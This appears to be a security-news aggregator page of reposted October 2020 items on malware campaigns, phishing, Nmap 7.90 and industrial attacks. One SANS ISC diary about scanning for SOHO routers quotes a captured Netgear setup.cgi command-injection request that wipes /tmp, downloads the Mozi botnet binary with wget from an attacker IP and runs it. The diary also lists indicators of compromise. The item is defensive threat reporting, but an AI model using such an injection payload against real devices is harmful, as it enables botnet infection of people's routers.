Network Security News Summary for Monday October 5 2020

A brief daily summary of what is important in cybersecurity. The podcast is published every weekday and designed to get you ready for the day with a brief, usually about 5 minutes long, summary of current network security-related events. The content is late breaking, educational and based on listener input as well as on input received by the SANS Internet Storm Center. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .

The post Network Security News Summary for Monday October 5 2020 appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/network-security-news-summary-for-monday-october-5-2020/?utm_source=rss&utm_medium=rss&utm_campaign=network-security-news-summary-for-monday-october-5-2020

DEF CON Safe Mode Recon Village – Mauro Eldritch’s ‘COVID 1984 Pandemic Propaganda And Surveillance’

Many thanks to DEF CON and Conference Speakers for publishing their comprehensive and outstanding presentations; of which, originally appeared at the organization’s DEFCON 28 SAFE MODE Conference, and on the DEF CON YouTube channel. Enjoy!

Permalink

The post DEF CON Safe Mode Recon Village – Mauro Eldritch’s ‘COVID 1984 Pandemic Propaganda And Surveillance’ appeared first on Security Boulevard.

Read More

The post DEF CON Safe Mode Recon Village – Mauro Eldritch’s ‘COVID 1984 Pandemic Propaganda And Surveillance’ appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/def-con-safe-mode-recon-village-mauro-eldritchs-covid-1984-pandemic-propaganda-and-surveillance/?utm_source=rss&utm_medium=rss&utm_campaign=def-con-safe-mode-recon-village-mauro-eldritchs-covid-1984-pandemic-propaganda-and-surveillance

Industrial Systems Face Increasing Cyberattacks

Researchers have witnessed an increased prevalence of malware campaigns targeting operational technology (OT) networks, with building automation and oil & gas firms being prominent targets.
Read More

The post Industrial Systems Face Increasing Cyberattacks appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/industrial-systems-face-increasing-cyberattacks/?utm_source=rss&utm_medium=rss&utm_campaign=industrial-systems-face-increasing-cyberattacks

Playing Trick and No Treat with Malicious Apps

Last month, researchers spotted 17 Android apps infected with the Joker trojan in Google Play Store. These malicious apps posed as utility service apps to bypass the Google Play vetting process.
Read More

The post Playing Trick and No Treat with Malicious Apps appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/playing-trick-and-no-treat-with-malicious-apps/?utm_source=rss&utm_medium=rss&utm_campaign=playing-trick-and-no-treat-with-malicious-apps

Robert M. Lee’s & Jeff Haas’ Little Bobby Comics – ‘WEEK 297’

via the respected information security capabilities of Robert M. Lee & the superlative illustration talents of Jeff Haas at Little Bobby Comics.

Permalink

The post Robert M. Lee’s & Jeff Haas’ Little Bobby Comics – ‘WEEK 297’ appeared first on Security Boulevard.

Read More

The post Robert M. Lee’s & Jeff Haas’ Little Bobby Comics – ‘WEEK 297’ appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/robert-m-lees-jeff-haas-little-bobby-comics-week-297/?utm_source=rss&utm_medium=rss&utm_campaign=robert-m-lees-jeff-haas-little-bobby-comics-week-297

DEF CON 28 Safe Mode Recon Village – Ladislav Baco’s ‘Hunting For Blue Mockingbird Coinminers’

Many thanks to DEF CON and Conference Speakers for publishing their comprehensive and outstanding presentations; of which, originally appeared at the organization’s DEFCON 28 SAFE MODE Conference, and on the DEF CON YouTube channel. Enjoy!

Permalink

The post DEF CON 28 Safe Mode Recon Village – Ladislav Baco’s ‘Hunting For Blue Mockingbird Coinminers’ appeared first on Security Boulevard.

Read More

The post DEF CON 28 Safe Mode Recon Village – Ladislav Baco’s ‘Hunting For Blue Mockingbird Coinminers’ appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/def-con-28-safe-mode-recon-village-ladislav-bacos-hunting-for-blue-mockingbird-coinminers/?utm_source=rss&utm_medium=rss&utm_campaign=def-con-28-safe-mode-recon-village-ladislav-bacos-hunting-for-blue-mockingbird-coinminers

Top Anti-Phishing Software Approach

What are the top software solutions for stopping phishing? By starting at where employees change their passwords, IT admins can avoid phishing altogether.

The post Top Anti-Phishing Software Approach appeared first on JumpCloud.

The post Top Anti-Phishing Software Approach appeared first on Security Boulevard.

Read More

The post Top Anti-Phishing Software Approach appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/top-anti-phishing-software-approach/?utm_source=rss&utm_medium=rss&utm_campaign=top-anti-phishing-software-approach

DHS Works to Protect National Critical Infrastructure

Last month, the Cybersecurity and Infrastructure Security Agency (CISA), which is part of the U.S. Department of Homeland Security (DHS), published two important resources that deserve special attention. While many of these CISA status reports may seem a bit like “alphabet soup” to those not familiar with the process, the importance of this National Critical..

The post DHS Works to Protect National Critical Infrastructure appeared first on Security Boulevard.

Read More

The post DHS Works to Protect National Critical Infrastructure appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/dhs-works-to-protect-national-critical-infrastructure/?utm_source=rss&utm_medium=rss&utm_campaign=dhs-works-to-protect-national-critical-infrastructure

Nmap 7.90 Released, (Sun, Oct 4th)

Nmap 7.90 is released, right after the release of Npcap 1.00, .

2 elements from the announcement I want to highlight:

With the production-ready and highly performant Npcap 1.00 driver included, we can finally recommend Nmap on Windows as a true peer to the traditional Linux builds.

We also did some long-needed license cleanup and gave the license a name (Nmap Public Source License) to avoid the previous confusion of Nmap being under "GPLv2 with various clarifications and exceptions". The NPSL is still based on the GPLv2, but brings in terms from some other popular open source licenses.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post Nmap 7.90 Released, (Sun, Oct 4th) appeared first on Malware Devil.

https://malwaredevil.com/2020/10/04/nmap-7-90-released-sun-oct-4th/?utm_source=rss&utm_medium=rss&utm_campaign=nmap-7-90-released-sun-oct-4th

Scanning for SOHO Routers, (Sat, Oct 3rd)

In the past 30 days lots of scanning activity looking for small office and home office (SOHO) routers targeting Netgear.

20201002-165049: 192.168.25.9:80-119.180.57.184:41237 data ‘GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//119.180.57.184:59209/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0rnrn’

Sampling multiple Mozi.a and Mozi.m files, analysis of each samples indicates if successful, it would attempt to connect the router to the Mirai botnet.

However, one of the file samples (Astra.mpsl) recovered was never submitted to Virustotal or any other sandbox and remained unidentified. Based on the information contained in the file, it is targeting the Huawei Home Gateway. One of the tell tale in the binary is the following string: ‘Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS‘ which likely indicate it would connect the router to the Hoaxcalls Botnet.

This is part of the content of Astra.mpsl which shows it the targeted router is Huawei Home Gateway.

Suspicious Files and Scripts: Mozi.a/m (Mirai Botnet)

dbc520ea1518748fec9fcfcf29755c30
a73ddd6ec22462db955439f665cad4e6
b9e122860983d035a21f6984a92bfb22
a73ddd6ec22462db955439f665cad4e6
521891351436e7e75ec2cdb91b0baf50
b9e122860983d035a21f6984a92bfb22

Suspicious Files and Scripts: (Hoaxcalls Botnet)
98eaa9a34533606924911ef15162102f  Astra.mpsl
cf6b4ccfc0414297a8a31c9349b6c3c246716829d4a15f3a2d3deae10bc2efde  Astra.mpsl

Indicators of Compromised

http[:]//192.210.214[.]51/bins/Astra.mpsl

SOHO Active Scanners

27.207.194.123
27.210.108.15
27.213.84.41
27.216.242.224
27.219.150.79
27.223.154.5
27.7.22.165
36.108.150.212
39.73.200.19
39.73.236.243
39.79.144.247
39.79.147.27
39.89.127.82
42.224.242.180
42.228.32.216
42.230.71.48
42.238.170.82
61.52.157.50
61.52.39.30
61.53.119.125
61.54.41.81
84.214.97.9
103.41.29.30
103.84.241.79
103.84.4.84
112.17.66.38
112.225.189.192
112.237.9.59
112.238.54.117
112.249.81.157
113.195.166.211
113.239.246.91
114.236.199.151
115.48.146.248
115.48.154.223
115.54.110.193
115.55.157.197
115.55.183.60
115.56.186.31
115.63.19.7
115.98.217.41
115.98.49.24
115.99.89.30
116.72.200.142
116.73.70.170
118.250.45.18
118.254.113.93
119.178.132.203
119.180.57.184
123.27.42.4
123.8.189.248
124.129.126.228
125.135.108.75
125.44.15.24
125.79.22.246
149.3.73.125
182.116.119.122
182.117.82.151
182.119.21.124
182.120.52.29
182.121.42.152
182.123.202.96
182.126.93.176
182.56.178.146
182.59.222.138
183.15.207.240
186.29.208.88
188.169.167.249
189.201.249.111
202.83.42.113
202.83.42.179
202.83.42.201
219.155.212.31
221.14.167.205
221.15.127.77
222.141.165.21
222.187.177.213
223.155.183.140

[1] https://isc.sans.edu/forums/diary/Mirai+Botnet+Activity/26234/
[2] https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
[3] https://consumer.huawei.com/en/routers/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post Scanning for SOHO Routers, (Sat, Oct 3rd) appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/scanning-for-soho-routers-sat-oct-3rd/?utm_source=rss&utm_medium=rss&utm_campaign=scanning-for-soho-routers-sat-oct-3rd

What Is Smishing? Definition, Examples & Protection Tips

While SMS phishing text scams are nothing new, they’re a type of threat that’s gaining traction with cybercriminals. Proofpoint reports that 84% of organizations faced smishing attacks in 2019 alone……

The post What Is Smishing? Definition, Examples & Protection Tips appeared first on Hashed Out by The SSL Store™.

The post What Is Smishing? Definition, Examples & Protection Tips appeared first on Security Boulevard.

Read More

The post What Is Smishing? Definition, Examples & Protection Tips appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/what-is-smishing-definition-examples-protection-tips/?utm_source=rss&utm_medium=rss&utm_campaign=what-is-smishing-definition-examples-protection-tips

How Remote Systems Communicate with Active Directory

Learn different challenges of managing Active Directory bound devices in the shifting work from home environment and how JumpCloud can help for free.

The post How Remote Systems Communicate with Active Directory appeared first on JumpCloud.

The post How Remote Systems Communicate with Active Directory appeared first on Security Boulevard.

Read More

The post How Remote Systems Communicate with Active Directory appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/how-remote-systems-communicate-with-active-directory/?utm_source=rss&utm_medium=rss&utm_campaign=how-remote-systems-communicate-with-active-directory

OldGremlin Definitely Did That!

The OldGremlin threat actor group has been targeting Russian companies, including financial institutions, medical firms, and industrial enterprises, with ransomware attacks.
Read More

The post OldGremlin Definitely Did That! appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/oldgremlin-definitely-did-that/?utm_source=rss&utm_medium=rss&utm_campaign=oldgremlin-definitely-did-that

The Game of Credential Abuse

Gamer credentials have become a lucrative target for cybercriminals. According to a recent Akamai study, accounts of 55% online gamers have been compromised at some point.
Read More

The post The Game of Credential Abuse appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/the-game-of-credential-abuse/?utm_source=rss&utm_medium=rss&utm_campaign=the-game-of-credential-abuse

Cybersecurity Takes Top Tech Priority as COVID-19 Spurs Transformation Projects

• Survey of over 600 IT leaders reveals the extent of COVID-19 disruption from a technological standpoint
• Areas like cybersecurity, network infrastructure and cloud strategy need urgent adaptation for a distributed workforce
• Cybersecurity is the top technology priority for digital transformation projects

A new survey sheds light on the highest priorities for IT teams in light of COVID-19 (i.e. remote workforce). According to the findings, cybersecurity is now a top-of-the-list priority, followed by cloud, data analytics and network infrastructure, as organizations urgently modernize their core technologies.

The post Cybersecurity Takes Top Tech Priority as COVID-19 Spurs Transformation Projects appeared first on Security Boulevard.

Read More

The post Cybersecurity Takes Top Tech Priority as COVID-19 Spurs Transformation Projects appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/cybersecurity-takes-top-tech-priority-as-covid-19-spurs-transformation-projects/?utm_source=rss&utm_medium=rss&utm_campaign=cybersecurity-takes-top-tech-priority-as-covid-19-spurs-transformation-projects

Cisco Acquires Kubernetes-Native Security Platform Portshift

Founded in 2018, Portshift focuses on providing security for Kubernetes and containers and takes an agentless approach to deliver vulnerability protection across images, containers, and deployments.
Read More

The post Cisco Acquires Kubernetes-Native Security Platform Portshift appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/cisco-acquires-kubernetes-native-security-platform-portshift/?utm_source=rss&utm_medium=rss&utm_campaign=cisco-acquires-kubernetes-native-security-platform-portshift

Facebook Details Malware Campaign Targeting Its Ad Platform

Referred to as SilentFade (Silently running Facebook ADs with Exploits), the malware was identified in late 2018 and the vulnerability it was exploiting to stay undetected was patched soon after.
Read More

The post Facebook Details Malware Campaign Targeting Its Ad Platform appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/facebook-details-malware-campaign-targeting-its-ad-platform/?utm_source=rss&utm_medium=rss&utm_campaign=facebook-details-malware-campaign-targeting-its-ad-platform

Google sets up research grant for finding bugs in browser JavaScript engines

Google has set up a research grant program to help and sponsor security researchers and academics find vulnerabilities in browser JavaScript engines through the “fuzzing” technique.
Read More

The post Google sets up research grant for finding bugs in browser JavaScript engines appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/google-sets-up-research-grant-for-finding-bugs-in-browser-javascript-engines/?utm_source=rss&utm_medium=rss&utm_campaign=google-sets-up-research-grant-for-finding-bugs-in-browser-javascript-engines

Spawn of Demonbot Attacks IoT Devices

The attack, orchestrated by someone using the alias “Priority,” was detected by a team at Juniper Threat Labs. Priority appears to have been up to no good since September 10.
Read More

The post Spawn of Demonbot Attacks IoT Devices appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/spawn-of-demonbot-attacks-iot-devices/?utm_source=rss&utm_medium=rss&utm_campaign=spawn-of-demonbot-attacks-iot-devices

LatAm Banking Trojans Collaborate in Never-Before-Seen Effort

A loose affiliation of cybercriminals are working together to author and distribute multiple families of banking trojans in Latin America – a collaborative effort that researchers say is unusual.
Read More

The post LatAm Banking Trojans Collaborate in Never-Before-Seen Effort appeared first on Malware Devil.

https://malwaredevil.com/2020/10/03/latam-banking-trojans-collaborate-in-never-before-seen-effort-2/?utm_source=rss&utm_medium=rss&utm_campaign=latam-banking-trojans-collaborate-in-never-before-seen-effort-2